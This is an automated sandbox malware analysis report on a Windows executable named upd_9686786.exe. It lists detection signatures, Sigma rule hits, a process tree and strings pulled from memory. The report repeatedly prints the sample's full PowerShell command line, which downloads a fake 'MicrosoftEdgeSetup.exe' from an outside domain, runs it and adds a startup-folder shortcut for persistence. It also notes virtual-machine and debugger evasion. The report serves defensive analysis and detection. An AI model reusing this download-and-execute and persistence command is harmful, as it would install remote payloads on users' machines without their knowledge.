Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
upd_9686786.exe

Overview

General Information

Sample name:upd_9686786.exe
Analysis ID:1523560
MD5:22f545cf93f55d3294abbbc7bfbbd6b8
SHA1:9f3fcce983368fe70ddf070919f2516981934885
SHA256:b93d7961d05376e6aa0e6d122ae50f34db078acc9e95ed6408f39750d386a74a
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Powershell creates an autostart link
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: PowerShell Web Download
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64native
  • upd_9686786.exe (PID: 7588 cmdline: "C:\Users\user\Desktop\upd_9686786.exe" MD5: 22F545CF93F55D3294ABBBC7BFBBD6B8)
    • powershell.exe (PID: 816 cmdline: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 2288 cmdline: cmd.exe /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • systeminfo.exe (PID: 6456 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
  • upd_9686786.exe (PID: 8512 cmdline: "C:\Users\user\Desktop\upd_9686786.exe" MD5: 22F545CF93F55D3294ABBBC7BFBBD6B8)
    • powershell.exe (PID: 8620 cmdline: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • cmd.exe (PID: 8628 cmdline: cmd.exe /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • systeminfo.exe (PID: 8736 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Source: File createdAuthor: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 816, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk
Sigma detected: Suspicious Invoke-WebRequest Execution
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upd_9686786.exe", ParentImage: C:\Users\user\Desktop\upd_9686786.exe, ParentProcessId: 7588, ParentProcessName: upd_9686786.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", ProcessId: 816, ProcessName: powershell.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upd_9686786.exe", ParentImage: C:\Users\user\Desktop\upd_9686786.exe, ParentProcessId: 7588, ParentProcessName: upd_9686786.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", ProcessId: 816, ProcessName: powershell.exe
Sigma detected: Startup Folder File Write
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 816, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnk
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upd_9686786.exe", ParentImage: C:\Users\user\Desktop\upd_9686786.exe, ParentProcessId: 7588, ParentProcessName: upd_9686786.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", ProcessId: 816, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\upd_9686786.exe", ParentImage: C:\Users\user\Desktop\upd_9686786.exe, ParentProcessId: 7588, ParentProcessName: upd_9686786.exe, ProcessCommandLine: powershell.exe -Command "Invoke-WebRequest -Uri \"https://apple-online.shop/MicrosoftEdgeSetup.exe\" -OutFile \"$env:TMP/MicrosoftEdgeSetup.exe\" ; & \"$env:TMP/MicrosoftEdgeSetup.exe\" ; $startupFolder = [System.IO.Path]::Combine($env:APPDATA, 'Microsoft\Windows\Start Menu\Programs\Startup') ; $programPath = 'C:\Users\user\Desktop\upd_9686786.exe' ; $shortcutName = 'tuygh.lnk' ; $shortcutPath = [System.IO.Path]::Combine($startupFolder, $shortcutName) ; $WshShell = New-Object -ComObject WScript.Shell ; $shortcut = $WshShell.CreateShortcut($shortcutPath) ; $shortcut.TargetPath = $programPath ; $shortcut.WorkingDirectory = [System.IO.Path]::GetDirectoryName($programPath) ; $shortcut.Save()", ProcessId: 816, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: upd_9686786.exeStatic PE information: certificate valid
Source: upd_9686786.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ion.pdbS]K source: powershell.exe, 00000009.00000002.30279686077.00000215F4476000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.30276312197.0000020DF2D7E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 6?t.Automation.pdb+ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System32\wshom.ocxb.pdb^ source: powershell.exe, 00000009.00000002.30279975334.00000215F44BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdb6.1.4.1.311. source: powershell.exe, 00000009.00000002.30274860324.0000020DF2CF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbb source: powershell.exe, 00000002.00000002.30012245368.00000177764AA000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewIP Address: 65.38.120.47 65.38.120.47
Source: Joe Sandbox ViewIP Address: 217.148.142.19 217.148.142.19
Source: Joe Sandbox ViewIP Address: 65.109.226.176 65.109.226.176
Source: C:\Users\user\Desktop\upd_9686786.exeCode function: 0_2_00007FF76E65568B recv,recv,0_2_00007FF76E65568B
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02B09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D82B02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://apple-online.shop
Source: upd_9686786.exeString found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
Source: upd_9686786.exeString found in binary or memory: http://cevcsca2021.ocsp-certum.com07
Source: upd_9686786.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: upd_9686786.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: upd_9686786.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30264940359.0000020DF0A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.29955133061.0000016F014F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F101BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: upd_9686786.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: upd_9686786.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: upd_9686786.exeString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
Source: upd_9686786.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: upd_9686786.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: upd_9686786.exeString found in binary or memory: http://subca.ocsp-certum.com02
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00E9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: upd_9686786.exeString found in binary or memory: http://www.certum.pl/CPS0
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02874000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F02B3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D82B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8214C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apple-online.shop
Source: powershell.exe, 00000009.00000002.30156809218.0000020D82CC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apple-online.shop/MicrosoftEdgeSetup.
Source: powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apple-online.shop/MicrosoftEdgeSetup.exe
Source: powershell.exe, 00000009.00000002.30278139073.0000020DF3640000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30264940359.0000020DF09D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apple-online.shop/microsoftedgesetup.exe
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF29F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000002.00000002.29955133061.0000016F0137B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F013A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D813A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81375000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000002.00000002.29955133061.0000016F02153000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8214C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.29955133061.0000016F014F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F101BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29997866930.0000016F10079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.29955133061.0000016F00235000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30256546918.0000020D90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D8022F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30156809218.0000020D81401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.30006749495.0000016F74E50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.30270316321.0000020DF2A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000009.00000002.30156809218.0000020D80E95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: upd_9686786.exeString found in binary or memory: https://www.certum.pl/CPS0
Source: upd_9686786.exeString found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\upd_9686786.exeCode function: 0_2_00007FF76E653B6A0_2_00007FF76E653B6A
Source: upd_9686786.exe, 00000000.00000002.34844852725.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamereinstated6 vs upd_9686786.exe
Source: upd_9686786.exe, 00000008.00000000.29967145448.00007FF76E65D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamereinstated6 vs upd_9686786.exe
Source: upd_9686786.exeBinary or memory string: OriginalFilenamereinstated6 vs upd_9686786.exe
Source: classification engineClassification label: mal60.evad.winEXE@18/6@0/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tuygh.lnkJump to behavior
